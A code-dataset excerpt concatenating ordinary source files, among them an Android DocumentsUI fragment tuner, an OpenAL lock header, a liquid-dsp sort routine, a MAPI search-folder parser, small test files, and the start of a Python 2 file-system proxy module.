max_stars_count
int64 301
224k
| text
stringlengths 6
1.05M
| token_count
int64 3
727k
|
---|---|---|
2,151 | <filename>third_party/android_tools/sdk/sources/android-25/com/android/documentsui/dirlist/FragmentTuner.java
/*
* Copyright (C) 2015 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.android.documentsui.dirlist;
import static com.android.documentsui.State.ACTION_BROWSE;
import static com.android.documentsui.State.ACTION_CREATE;
import static com.android.documentsui.State.ACTION_GET_CONTENT;
import static com.android.documentsui.State.ACTION_OPEN;
import static com.android.documentsui.State.ACTION_OPEN_TREE;
import static com.android.documentsui.State.ACTION_PICK_COPY_DESTINATION;
import android.content.Context;
import android.provider.DocumentsContract.Document;
import android.view.Menu;
import android.view.MenuItem;
import com.android.documentsui.BaseActivity;
import com.android.documentsui.Menus;
import com.android.documentsui.MimePredicate;
import com.android.documentsui.R;
import com.android.documentsui.State;
import com.android.documentsui.dirlist.DirectoryFragment.ResultType;
/**
* Providers support for specializing the DirectoryFragment to the "host" Activity.
* Feel free to expand the role of this class to handle other specializations.
*/
public abstract class FragmentTuner {
final Context mContext;
final State mState;
public FragmentTuner(Context context, State state) {
mContext = context;
mState = state;
}
/**
 * Factory: returns the tuner matching the hosting activity. The Files
 * activity uses ACTION_BROWSE; every other action belongs to the pickers.
 */
public static FragmentTuner pick(Context context, State state) {
switch (state.action) {
case ACTION_BROWSE:
return new FilesTuner(context, state);
default:
return new DocumentsTuner(context, state);
}
}
// Subtly different from isDocumentEnabled. The reason may be illuminated as follows.
// A folder is enabled such that it may be double clicked, even in settings
// when the folder itself cannot be selected. This may also be true of container types.
public boolean canSelectType(String docMimeType, int docFlags) {
return true;
}
public boolean isDocumentEnabled(String docMimeType, int docFlags) {
return true;
}
/**
 * When managed mode is enabled, active downloads will be visible in the UI.
 * Presumably this should only be true when in the downloads directory.
 */
boolean managedModeEnabled() {
return false;
}
/**
 * Whether drag n' drop is allowed in this context
 */
boolean dragAndDropEnabled() {
return false;
}
/** Shows/hides/enables action-mode menu items appropriate for the current selection. */
abstract void updateActionMenu(Menu menu, SelectionDetails selection);
/** Called after the directory model (re)loads so tuners can react (e.g. open the roots drawer). */
abstract void onModelLoaded(Model model, @ResultType int resultType, boolean isSearch);
/**
 * Provides support for Platform specific specializations of DirectoryFragment.
 */
private static final class DocumentsTuner extends FragmentTuner {
// We use this to keep track of whether a model has been previously loaded or not so we can
// open the drawer on empty directories on first launch
private boolean mModelPreviousLoaded;
public DocumentsTuner(Context context, State state) {
super(context, state);
}
@Override
public boolean canSelectType(String docMimeType, int docFlags) {
if (!isDocumentEnabled(docMimeType, docFlags)) {
return false;
}
if (MimePredicate.isDirectoryType(docMimeType)) {
return false;
}
if (mState.action == ACTION_OPEN_TREE
|| mState.action == ACTION_PICK_COPY_DESTINATION) {
// In this case nothing *ever* is selectable...the expected user behavior is
// they navigate *into* a folder, then click a confirmation button indicating
// that the current directory is the directory they are picking.
return false;
}
return true;
}
@Override
public boolean isDocumentEnabled(String mimeType, int docFlags) {
// Directories are always enabled.
if (MimePredicate.isDirectoryType(mimeType)) {
return true;
}
switch (mState.action) {
case ACTION_CREATE:
// Read-only files are disabled when creating.
if ((docFlags & Document.FLAG_SUPPORTS_WRITE) == 0) {
return false;
}
// fall through (intentional — no break): documents in CREATE mode must
// also pass the virtual-document check shared with OPEN/GET_CONTENT.
case ACTION_OPEN:
case ACTION_GET_CONTENT:
final boolean isVirtual = (docFlags & Document.FLAG_VIRTUAL_DOCUMENT) != 0;
if (isVirtual && mState.openableOnly) {
return false;
}
}
return MimePredicate.mimeMatches(mState.acceptMimes, mimeType);
}
@Override
public void updateActionMenu(Menu menu, SelectionDetails selection) {
MenuItem open = menu.findItem(R.id.menu_open);
MenuItem share = menu.findItem(R.id.menu_share);
MenuItem delete = menu.findItem(R.id.menu_delete);
MenuItem rename = menu.findItem(R.id.menu_rename);
MenuItem selectAll = menu.findItem(R.id.menu_select_all);
// Pickers only ever "open" a selection; file-management commands stay hidden.
open.setVisible(mState.action == ACTION_GET_CONTENT
|| mState.action == ACTION_OPEN);
share.setVisible(false);
delete.setVisible(false);
rename.setVisible(false);
selectAll.setVisible(mState.allowMultiple);
Menus.disableHiddenItems(menu);
}
@Override
void onModelLoaded(Model model, @ResultType int resultType, boolean isSearch) {
boolean showDrawer = false;
// NOTE(review): this branch is a no-op — showDrawer is already false.
// Presumably kept to document that visual-media pickers leave the drawer shut.
if (MimePredicate.mimeMatches(MimePredicate.VISUAL_MIMES, mState.acceptMimes)) {
showDrawer = false;
}
if (mState.external && mState.action == ACTION_GET_CONTENT) {
showDrawer = true;
}
if (mState.action == ACTION_PICK_COPY_DESTINATION) {
showDrawer = true;
}
// When launched into empty root, open drawer.
if (model.isEmpty()) {
showDrawer = true;
}
// Only auto-open on the very first load, and never when the user has already
// navigated away from the initial location or is searching.
if (showDrawer && !mState.hasInitialLocationChanged() && !isSearch
&& !mModelPreviousLoaded) {
// This noops on layouts without drawer, so no need to guard.
((BaseActivity) mContext).setRootsDrawerOpen(true);
}
mModelPreviousLoaded = true;
}
}
/**
 * Provides support for Files activity specific specializations of DirectoryFragment.
 */
private static final class FilesTuner extends FragmentTuner {
// We use this to keep track of whether a model has been previously loaded or not so we can
// open the drawer on empty directories on first launch
private boolean mModelPreviousLoaded;
public FilesTuner(Context context, State state) {
super(context, state);
}
@Override
public void updateActionMenu(Menu menu, SelectionDetails selection) {
menu.findItem(R.id.menu_open).setVisible(false); // "open" is never used in Files.
// Commands accessible only via keyboard...
MenuItem copy = menu.findItem(R.id.menu_copy_to_clipboard);
MenuItem paste = menu.findItem(R.id.menu_paste_from_clipboard);
// Commands visible in the UI...
MenuItem rename = menu.findItem(R.id.menu_rename);
MenuItem moveTo = menu.findItem(R.id.menu_move_to);
MenuItem copyTo = menu.findItem(R.id.menu_copy_to);
MenuItem share = menu.findItem(R.id.menu_share);
MenuItem delete = menu.findItem(R.id.menu_delete);
// copy is not visible, keyboard only
copy.setEnabled(!selection.containsPartialFiles());
// Commands usually on action-bar, so we always manage visibility.
share.setVisible(!selection.containsDirectories() && !selection.containsPartialFiles());
delete.setVisible(selection.canDelete());
share.setEnabled(!selection.containsDirectories() && !selection.containsPartialFiles());
delete.setEnabled(selection.canDelete());
// Commands always in overflow, so we don't bother showing/hiding...
copyTo.setVisible(true);
moveTo.setVisible(true);
rename.setVisible(true);
copyTo.setEnabled(!selection.containsPartialFiles());
moveTo.setEnabled(!selection.containsPartialFiles() && selection.canDelete());
rename.setEnabled(!selection.containsPartialFiles() && selection.canRename());
Menus.disableHiddenItems(menu, copy, paste);
}
@Override
void onModelLoaded(Model model, @ResultType int resultType, boolean isSearch) {
// When launched into empty root, open drawer.
if (model.isEmpty() && !mState.hasInitialLocationChanged() && !isSearch
&& !mModelPreviousLoaded) {
// This noops on layouts without drawer, so no need to guard.
((BaseActivity) mContext).setRootsDrawerOpen(true);
}
mModelPreviousLoaded = true;
}
@Override
public boolean managedModeEnabled() {
// When in downloads top level directory, we also show active downloads.
// And while we don't allow folders in Downloads, we do allow Zip files in
// downloads that themselves can be opened and viewed like directories.
// This method helps us understand when to kick in on those special behaviors.
return mState.stack.root != null
&& mState.stack.root.isDownloads()
&& mState.stack.size() == 1;
}
@Override
public boolean dragAndDropEnabled() {
return true;
}
}
/**
 * Access to meta data about the selection.
 */
interface SelectionDetails {
boolean containsDirectories();
boolean containsPartialFiles();
// TODO: Update these to express characteristics instead of answering concrete questions,
// since the answer to those questions is (or can be) activity specific.
boolean canDelete();
boolean canRename();
}
}
| 4,462 |
4,047 | #include<gtest/gtest.h>
// Smoke tests verifying the googletest harness itself is wired up correctly.
TEST(basic_test, eq_works) {
ASSERT_EQ(0, 1-1) << "Equality is broken. Mass panic!";
}
TEST(basic_test, neq_works) {
ASSERT_NE(15, 106) << "Inequal is equal. The foundations of space and time are in jeopardy.";
}
| 104 |
14,668 | // Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef ASH_PUBLIC_CPP_PAGINATION_PAGINATION_MODEL_OBSERVER_H_
#define ASH_PUBLIC_CPP_PAGINATION_PAGINATION_MODEL_OBSERVER_H_
#include "ash/public/cpp/ash_public_export.h"
namespace ash {
// Observer interface for pagination state; all methods have empty default
// bodies, so implementers override only the notifications they care about.
class ASH_PUBLIC_EXPORT PaginationModelObserver {
public:
// Invoked when the total number of pages changes.
virtual void TotalPagesChanged(int previous_page_count, int new_page_count) {}
// Invoked when the selected page index changes.
virtual void SelectedPageChanged(int old_selected, int new_selected) {}
// Invoked right before a transition starts.
virtual void TransitionStarting() {}
// Invoked right after a transition has started.
virtual void TransitionStarted() {}
// Invoked when the transition data is changed.
virtual void TransitionChanged() {}
// Invoked when a transition ends.
virtual void TransitionEnded() {}
// Invoked when a grid scroll starts.
virtual void ScrollStarted() {}
// Invoked when a grid scroll ends.
virtual void ScrollEnded() {}
protected:
// Protected dtor: observers are not owned (or deleted) through this interface.
virtual ~PaginationModelObserver() {}
};
} // namespace ash
#endif // ASH_PUBLIC_CPP_PAGINATION_PAGINATION_MODEL_OBSERVER_H_
| 402 |
1,078 | #ifndef AL_RWLOCK_H
#define AL_RWLOCK_H
#include "AL/al.h"
#include "atomic.h"
/* Reader/writer lock state built on atomic refcounts and spin flags.
 * NOTE(review): exact locking protocol lives in the implementation file;
 * the field notes below are inferred from the names — confirm there. */
typedef struct {
volatile RefCount read_count;      /* presumably: number of active readers */
volatile RefCount write_count;     /* presumably: number of active/waiting writers */
volatile ALenum read_lock;
volatile ALenum read_entry_lock;
volatile ALenum write_lock;
} RWLock;
/* Initialize the lock's members; must be called before any Lock/Unlock use. */
void RWLockInit(RWLock *lock);
void ReadLock(RWLock *lock);
void ReadUnlock(RWLock *lock);
void WriteLock(RWLock *lock);
void WriteUnlock(RWLock *lock);
#endif /* AL_RWLOCK_H */
| 174 |
1,382 | <reponame>vankxr/liquid-dsp
/*
* Copyright (c) 2007 - 2015 <NAME>
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
//
// optim.common.c
//
#include <stdio.h>
#include <stdlib.h>
#include "liquid.internal.h"
// optimization threshold switch
// _u0 : first utility
// _u1 : second utility
// _minimize : minimize flag
//
// returns:
// (_u0 > _u1) if (_minimize == 1)
// (_u0 < _u1) otherwise
// Compare two utilities under the current optimization sense.
//  _u0       : first utility
//  _u1       : second utility
//  _minimize : non-zero when the optimizer is minimizing
//
// Returns non-zero when _u0 is "worse" than _u1 for the given sense:
//  (_u0 > _u1) when minimizing, (_u0 < _u1) when maximizing.
int optim_threshold_switch(float _u0,
                           float _u1,
                           int _minimize)
{
    if (_minimize)
        return _u0 > _u1;

    return _u0 < _u1;
}
// sort values by index
// _v : input values [size: _len x 1]
// _rank : output rank array (indices) [size: _len x 1]
// _len : length of input array
// _descending : descending/ascending
// Rank the values in _v by sorted order without moving them.
//  _v          : input values [size: _len x 1] (unchanged)
//  _rank       : output permutation; _v[_rank[0]] is the best value
//  _len        : number of elements
//  _descending : non-zero for descending order, zero for ascending
void optim_sort(float *_v,
                unsigned int * _rank,
                unsigned int _len,
                int _descending)
{
    unsigned int pass, k;

    // start from the identity permutation
    for (pass = 0; pass < _len; pass++)
        _rank[pass] = pass;

    // bubble sort on the index array: each pass carries the best remaining
    // candidate toward the front; comparisons are strict, so equal values
    // keep their original relative order (stable)
    for (pass = 0; pass < _len; pass++) {
        for (k = _len - 1; k > pass; k--) {
            if ( optim_threshold_switch(_v[_rank[k]], _v[_rank[k-1]], _descending) ) {
                unsigned int swap = _rank[k];
                _rank[k]   = _rank[k-1];
                _rank[k-1] = swap;
            }
        }
    }
}
| 1,016 |
348 | {"nom":"Tréglonou","circ":"5ème circonscription","dpt":"Finistère","inscrits":500,"abs":253,"votants":247,"blancs":38,"nuls":14,"exp":195,"res":[{"nuance":"REM","nom":"<NAME>","voix":120},{"nuance":"DVD","nom":"<NAME>","voix":75}]} | 91 |
435 | <reponame>tianliangyihou/LBPhotoBrowser
//
// LBCell.h
// test
//
// Created by dengweihao on 2017/12/26.
// Copyright © 2017年 dengweihao. All rights reserved.
//
#import <UIKit/UIKit.h>
#import "LBModel.h"
#define LB_WEAK_SELF __weak typeof(self)wself = self
static NSString *ID = @"lb.cell";
@interface LBCell : UITableViewCell
@property (nonatomic , strong)NSMutableArray *imageViews;
@property (nonatomic , strong)NSMutableArray *frames;
@property (nonatomic , strong)LBModel *model;
@property (nonatomic , copy)void (^callBack)(LBModel *cellModel, int tag);
@end
| 214 |
589 | package rocks.inspectit.ui.rcp.ci.testers;
import org.apache.commons.lang.ArrayUtils;
import org.eclipse.core.expressions.PropertyTester;
import rocks.inspectit.shared.cs.ci.business.impl.ApplicationDefinition;
import rocks.inspectit.shared.cs.ci.business.impl.BusinessTransactionDefinition;
import rocks.inspectit.ui.rcp.provider.IApplicationProvider;
/**
* Property tester for the business context.
*
* @author <NAME>
*
*/
public class BusinessContextTester extends PropertyTester {
/**
 * Tester property for the default application.
 */
public static final String IS_DEFAULT_APP_PROPERTY = "isDefaultApplication";
/**
 * Tester property for the default business transaction.
 */
public static final String IS_DEFAULT_BTX_PROPERTY = "isDefaultBusinessTransaction";
/**
 * Tester property for the moving up capability.
 */
public static final String CAN_MOVE_UP_PROPERTY = "canMoveUp";
/**
 * Tester property for the moving down capability.
 */
public static final String CAN_MOVE_DOWN_PROPERTY = "canMoveDown";
/**
 * {@inheritDoc}
 */
@Override
public boolean test(Object receiver, String property, Object[] args, Object expectedValue) {
if (receiver instanceof IApplicationProvider) {
IApplicationProvider applicationProvider = (IApplicationProvider) receiver;
if (IS_DEFAULT_APP_PROPERTY.equals(property)) {
return applicationProvider.getApplication().getId() == ApplicationDefinition.DEFAULT_ID;
} else if (CAN_MOVE_UP_PROPERTY.equals(property)) {
return applicationProvider.getIndexInParentList() > 0;
} else if (CAN_MOVE_DOWN_PROPERTY.equals(property)) {
int listSize = applicationProvider.getParentList().size();
// NOTE(review): 'listSize - 2' (rather than '- 1') presumably reserves the
// last slot for the non-movable default definition — confirm; otherwise this
// is an off-by-one that also blocks the second-to-last element from moving down.
return applicationProvider.getIndexInParentList() < listSize - 2;
}
}
if (receiver instanceof BusinessTransactionDefinition) {
BusinessTransactionDefinition businessTransactionDef = (BusinessTransactionDefinition) receiver;
if (IS_DEFAULT_BTX_PROPERTY.equals(property)) {
return businessTransactionDef.getId() == BusinessTransactionDefinition.DEFAULT_ID;
} else if (CAN_MOVE_UP_PROPERTY.equals(property) && ArrayUtils.isNotEmpty(args) && args[0] instanceof ApplicationDefinition) {
return ((ApplicationDefinition) args[0]).getBusinessTransactionDefinitions().indexOf(businessTransactionDef) > 0;
} else if (CAN_MOVE_DOWN_PROPERTY.equals(property) && ArrayUtils.isNotEmpty(args) && args[0] instanceof ApplicationDefinition) {
int index = ((ApplicationDefinition) args[0]).getBusinessTransactionDefinitions().indexOf(businessTransactionDef);
// NOTE(review): same '- 2' bound as above — presumably keeps the default
// business transaction pinned at the end of the list; verify intent.
return index >= 0 && index < ((ApplicationDefinition) args[0]).getBusinessTransactionDefinitions().size() - 2;
}
}
// Unknown receiver type or property: property does not hold.
return false;
}
}
| 832 |
655 | <filename>core/smartview/SearchFolderDefinition.cpp
#include <core/stdafx.h>
#include <core/smartview/SearchFolderDefinition.h>
#include <core/smartview/RestrictionStruct.h>
#include <core/smartview/PropertiesStruct.h>
#include <core/mapi/extraPropTags.h>
#include <core/smartview/SmartView.h>
namespace smartview
{
// Reads one address-list entry: a property count, a pad DWORD, and (when the
// count is non-zero) the property list itself.
void AddressListEntryStruct::parse()
{
PropertyCount = blockT<DWORD>::parse(parser);
Pad = blockT<DWORD>::parse(parser);
if (*PropertyCount)
{
Props = std::make_shared<PropertiesStruct>(*PropertyCount, false, false);
Props->block::parse(parser, false);
}
}
// Emits the parsed fields as labeled child nodes for display.
void AddressListEntryStruct::parseBlocks()
{
addChild(PropertyCount, L"PropertyCount = 0x%1!08X!", PropertyCount->getData());
addChild(Pad, L"Pad = 0x%1!08X!", Pad->getData());
addChild(Props, L"Properties");
}
// Parses a persisted search folder definition from the stream held by `parser`.
// Field order mirrors the on-disk layout; optional sections are gated on the
// flags word parsed up front.
void SearchFolderDefinition::parse()
{
m_Version = blockT<DWORD>::parse(parser);
m_Flags = blockT<DWORD>::parse(parser);
m_NumericSearch = blockT<DWORD>::parse(parser);
m_TextSearchLength = blockT<BYTE>::parse(parser);
size_t cchTextSearch = *m_TextSearchLength;
// A length byte of 255 is an escape: the real length follows as a WORD.
if (*m_TextSearchLength == 255)
{
m_TextSearchLengthExtended = blockT<WORD>::parse(parser);
cchTextSearch = *m_TextSearchLengthExtended;
}
if (cchTextSearch)
{
m_TextSearch = blockStringW::parse(parser, cchTextSearch);
}
m_SkipLen1 = blockT<DWORD>::parse(parser);
m_SkipBytes1 = blockBytes::parse(parser, *m_SkipLen1, _MaxBytes);
m_DeepSearch = blockT<DWORD>::parse(parser);
m_FolderList1Length = blockT<BYTE>::parse(parser);
size_t cchFolderList1 = *m_FolderList1Length;
// Same 255 => WORD-extended length escape as the text search above.
if (*m_FolderList1Length == 255)
{
m_FolderList1LengthExtended = blockT<WORD>::parse(parser);
cchFolderList1 = *m_FolderList1LengthExtended;
}
if (cchFolderList1)
{
m_FolderList1 = blockStringW::parse(parser, cchFolderList1);
}
m_FolderList2Length = blockT<DWORD>::parse(parser);
// NOTE(review): this tests the smart pointer (which parse() presumably always
// returns non-null), not the parsed length — compare `if (cchFolderList1)`
// above. Likely intended: `if (*m_FolderList2Length)`; confirm before changing.
if (m_FolderList2Length)
{
m_FolderList2 = block::parse<EntryList>(parser, *m_FolderList2Length, true);
}
if (*m_Flags & SFST_BINARY)
{
m_AddressCount = blockT<DWORD>::parse(parser);
if (*m_AddressCount)
{
// Cap protects against a corrupt count driving a huge parse loop.
if (*m_AddressCount < _MaxEntriesSmall)
{
m_Addresses.reserve(*m_AddressCount);
for (DWORD i = 0; i < *m_AddressCount; i++)
{
m_Addresses.emplace_back(block::parse<AddressListEntryStruct>(parser, false));
}
}
}
}
m_SkipLen2 = blockT<DWORD>::parse(parser);
m_SkipBytes2 = blockBytes::parse(parser, *m_SkipLen2, _MaxBytes);
if (*m_Flags & SFST_MRES)
{
m_Restriction = std::make_shared<RestrictionStruct>(false, true);
m_Restriction->block::parse(parser, false);
}
if (*m_Flags & SFST_FILTERSTREAM)
{
const auto cbRemainingBytes = parser->getSize();
// Since the format for SFST_FILTERSTREAM isn't documented, just assume that everything remaining
// is part of this bucket. We leave DWORD space for the final skip block, which should be empty
if (cbRemainingBytes > sizeof DWORD)
{
m_AdvancedSearchBytes = blockBytes::parse(parser, cbRemainingBytes - sizeof DWORD);
}
}
m_SkipLen3 = blockT<DWORD>::parse(parser);
// NOTE(review): pointer test again — likely intended `*m_SkipLen3`, though
// parsing zero bytes here would be harmless either way.
if (m_SkipLen3)
{
m_SkipBytes3 = blockBytes::parse(parser, *m_SkipLen3, _MaxBytes);
}
}
void SearchFolderDefinition::parseBlocks()
{
setText(L"Search Folder Definition");
addChild(m_Version, L"Version = 0x%1!08X!", m_Version->getData());
addChild(
m_Flags,
L"Flags = 0x%1!08X! = %2!ws!",
m_Flags->getData(),
InterpretNumberAsStringProp(*m_Flags, PR_WB_SF_STORAGE_TYPE).c_str());
addChild(m_NumericSearch, L"Numeric Search = 0x%1!08X!", m_NumericSearch->getData());
addChild(m_TextSearchLength, L"Text Search Length = 0x%1!02X!", m_TextSearchLength->getData());
if (*m_TextSearchLength)
{
addChild(
m_TextSearchLengthExtended,
L"Text Search Length Extended = 0x%1!04X!",
m_TextSearchLengthExtended->getData());
addLabeledChild(L"Text Search", m_TextSearch);
}
addChild(m_SkipLen1, L"SkipLen1 = 0x%1!08X!", m_SkipLen1->getData());
if (*m_SkipLen1)
{
addLabeledChild(L"SkipBytes1", m_SkipBytes1);
}
addChild(m_DeepSearch, L"Deep Search = 0x%1!08X!", m_DeepSearch->getData());
addChild(m_FolderList1Length, L"Folder List 1 Length = 0x%1!02X!", m_FolderList1Length->getData());
if (*m_FolderList1Length)
{
addChild(
m_FolderList1LengthExtended,
L"Folder List 1 Length Extended = 0x%1!04X!",
m_FolderList1LengthExtended->getData());
addLabeledChild(L"Folder List 1", m_FolderList1);
}
addChild(m_FolderList2Length, L"Folder List 2 Length = 0x%1!08X!", m_FolderList2Length->getData());
if (m_FolderList2)
{
addLabeledChild(L"Folder List2", m_FolderList2);
}
if (*m_Flags & SFST_BINARY)
{
addChild(m_AddressCount, L"AddressCount = 0x%1!08X!", m_AddressCount->getData());
auto i = DWORD{};
for (const auto& address : m_Addresses)
{
addChild(address, L"Addresses[%1!d!]", i);
i++;
}
}
addChild(m_SkipLen2, L"SkipLen2 = 0x%1!08X!", m_SkipLen2->getData());
addLabeledChild(L"SkipBytes2", m_SkipBytes2);
if (m_Restriction && m_Restriction->hasData())
{
addChild(m_Restriction);
}
if (*m_Flags & SFST_FILTERSTREAM)
{
addHeader(L"AdvancedSearchLen = 0x%1!08X!", m_AdvancedSearchBytes->size());
if (!m_AdvancedSearchBytes->empty())
{
addLabeledChild(L"AdvancedSearchBytes", m_AdvancedSearchBytes);
}
}
addChild(m_SkipLen3, L"SkipLen3 = 0x%1!08X!", m_SkipLen3->getData());
addLabeledChild(L"SkipBytes3", m_SkipBytes3);
}
} // namespace smartview | 2,298 |
66,985 | /*
* Copyright 2012-2019 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.boot;
import org.junit.jupiter.api.Test;
import org.springframework.beans.factory.config.BeanDefinition;
import static org.assertj.core.api.Assertions.assertThat;
import static org.mockito.Mockito.mock;
/**
* Tests for {@link LazyInitializationExcludeFilter}.
*
* @author <NAME>
*/
class LazyInitializationExcludeFilterTests {
@Test
void forBeanTypesMatchesTypes() {
LazyInitializationExcludeFilter filter = LazyInitializationExcludeFilter.forBeanTypes(CharSequence.class,
Number.class);
String beanName = "test";
BeanDefinition beanDefinition = mock(BeanDefinition.class);
// Exact configured types and their subtypes must be excluded...
assertThat(filter.isExcluded(beanName, beanDefinition, CharSequence.class)).isTrue();
assertThat(filter.isExcluded(beanName, beanDefinition, String.class)).isTrue();
assertThat(filter.isExcluded(beanName, beanDefinition, StringBuilder.class)).isTrue();
assertThat(filter.isExcluded(beanName, beanDefinition, Number.class)).isTrue();
assertThat(filter.isExcluded(beanName, beanDefinition, Long.class)).isTrue();
// ...while an unrelated type is not.
assertThat(filter.isExcluded(beanName, beanDefinition, Boolean.class)).isFalse();
}
}
| 522 |
4,054 | /*
* Copyright (c) 2019 BestSolution.at and others.
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* which accompanies this distribution, and is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* Contributors:
* <NAME> <<EMAIL>> - initial API and implementation
*/
#include <DriftFX/Context.h>
using namespace driftfx;
Context::Context() {
}
Context::~Context() {
}
// Base implementation returns 0 (no texture created).
// NOTE(review): the trivial body suggests subclasses are expected to
// override this with a real allocation — confirm against the API docs.
Texture* Context::CreateTexture(int width, int height) {
return 0;
}
| 167 |
1,848 | <gh_stars>1000+
// bindgen-flags: --rustified-enum ".*"
/**
* Stores a pointer to the ops struct, and the offset: the place to
* write the parsed result in the destination structure.
*/
struct cmdline_token_hdr {
struct cmdline_token_ops *ops;
unsigned int offset;
};
typedef struct cmdline_token_hdr cmdline_parse_token_hdr_t;
/**
* A token is defined by this structure.
*
* parse() takes the token as first argument, then the source buffer
* starting at the token we want to parse. The 3rd arg is a pointer
* where we store the parsed data (as binary). It returns the number of
* parsed chars on success and a negative value on error.
*
* complete_get_nb() returns the number of possible values for this
* token if completion is possible. If it is NULL or if it returns 0,
* no completion is possible.
*
* complete_get_elt() copy in dstbuf (the size is specified in the
* parameter) the i-th possible completion for this token. returns 0
* on success or and a negative value on error.
*
* get_help() fills the dstbuf with the help for the token. It returns
* -1 on error and 0 on success.
*/
struct cmdline_token_ops {
/** parse(token ptr, buf, res pts, buf len) */
int (*parse)(cmdline_parse_token_hdr_t *, const char *, void *,
unsigned int);
/** return the num of possible choices for this token */
int (*complete_get_nb)(cmdline_parse_token_hdr_t *);
/** return the elt x for this token (token, idx, dstbuf, size) */
int (*complete_get_elt)(cmdline_parse_token_hdr_t *, int, char *,
unsigned int);
/** get help for this token (token, dstbuf, size) */
int (*get_help)(cmdline_parse_token_hdr_t *, char *, unsigned int);
};
enum cmdline_numtype {
UINT8 = 0,
UINT16,
UINT32,
UINT64,
INT8,
INT16,
INT32,
INT64
};
struct cmdline_token_num_data {
enum cmdline_numtype type;
};
struct cmdline_token_num {
struct cmdline_token_hdr hdr;
struct cmdline_token_num_data num_data;
};
typedef struct cmdline_token_num cmdline_parse_token_num_t;
| 654 |
771 | <reponame>revolunet/tiny-helpers
{
"name": "Lighthouse CI Diff",
"desc": "Compare two Lighthouse reports",
"url": "https://googlechrome.github.io/lighthouse-ci/viewer/",
"tags": [
"Performance"
],
"maintainers": [],
"addedAt": "2021-01-09"
}
| 105 |
2,757 | """File System Proxy.
Provide an OS-neutral view on a file system, locally or remotely.
The functionality is geared towards implementing some sort of
rdist-like utility between a Mac and a UNIX system.
The module defines three classes:
FSProxyLocal -- used for local access
FSProxyServer -- used on the server side of remote access
FSProxyClient -- used on the client side of remote access
The remote classes are instantiated with an IP address and an optional
verbosity flag.
"""
import server
import client
import md5
import os
import fnmatch
from stat import *
import time
import fnmatch
maxnamelen = 255
skipnames = (os.curdir, os.pardir)
class FSProxyLocal:
def __init__(self):
self._dirstack = []
self._ignore = ['*.pyc'] + self._readignore()
def _close(self):
while self._dirstack:
self.back()
def _readignore(self):
file = self._hide('ignore')
try:
f = open(file)
except IOError:
file = self._hide('synctree.ignorefiles')
try:
f = open(file)
except IOError:
return []
ignore = []
while 1:
line = f.readline()
if not line: break
if line[-1] == '\n': line = line[:-1]
ignore.append(line)
f.close()
return ignore
def _hidden(self, name):
return name[0] == '.'
def _hide(self, name):
return '.%s' % name
def visible(self, name):
if len(name) > maxnamelen: return 0
if name[-1] == '~': return 0
if name in skipnames: return 0
if self._hidden(name): return 0
head, tail = os.path.split(name)
if head or not tail: return 0
if os.path.islink(name): return 0
if '\0' in open(name, 'rb').read(512): return 0
for ign in self._ignore:
if fnmatch.fnmatch(name, ign): return 0
return 1
def check(self, name):
if not self.visible(name):
raise os.error, "protected name %s" % repr(name)
def checkfile(self, name):
self.check(name)
if not os.path.isfile(name):
raise os.error, "not a plain file %s" % repr(name)
def pwd(self):
return os.getcwd()
def cd(self, name):
self.check(name)
save = os.getcwd(), self._ignore
os.chdir(name)
self._dirstack.append(save)
self._ignore = self._ignore + self._readignore()
def back(self):
if not self._dirstack:
raise os.error, "empty directory stack"
dir, ignore = self._dirstack[-1]
os.chdir(dir)
del self._dirstack[-1]
self._ignore = ignore
def _filter(self, files, pat = None):
if pat:
def keep(name, pat = pat):
return fnmatch.fnmatch(name, pat)
files = filter(keep, files)
files = filter(self.visible, files)
files.sort()
return files
def list(self, pat = None):
files = os.listdir(os.curdir)
return self._filter(files, pat)
def listfiles(self, pat = None):
files = os.listdir(os.curdir)
files = filter(os.path.isfile, files)
return self._filter(files, pat)
def listsubdirs(self, pat = None):
files = os.listdir(os.curdir)
files = filter(os.path.isdir, files)
return self._filter(files, pat)
def exists(self, name):
return self.visible(name) and os.path.exists(name)
def isdir(self, name):
return self.visible(name) and os.path.isdir(name)
def islink(self, name):
return self.visible(name) and os.path.islink(name)
def isfile(self, name):
return self.visible(name) and os.path.isfile(name)
def sum(self, name):
self.checkfile(name)
BUFFERSIZE = 1024*8
f = open(name)
sum = md5.new()
while 1:
buffer = f.read(BUFFERSIZE)
if not buffer:
break
sum.update(buffer)
return sum.digest()
def size(self, name):
self.checkfile(name)
return os.stat(name)[ST_SIZE]
def mtime(self, name):
self.checkfile(name)
return time.localtime(os.stat(name)[ST_MTIME])
def stat(self, name):
self.checkfile(name)
size = os.stat(name)[ST_SIZE]
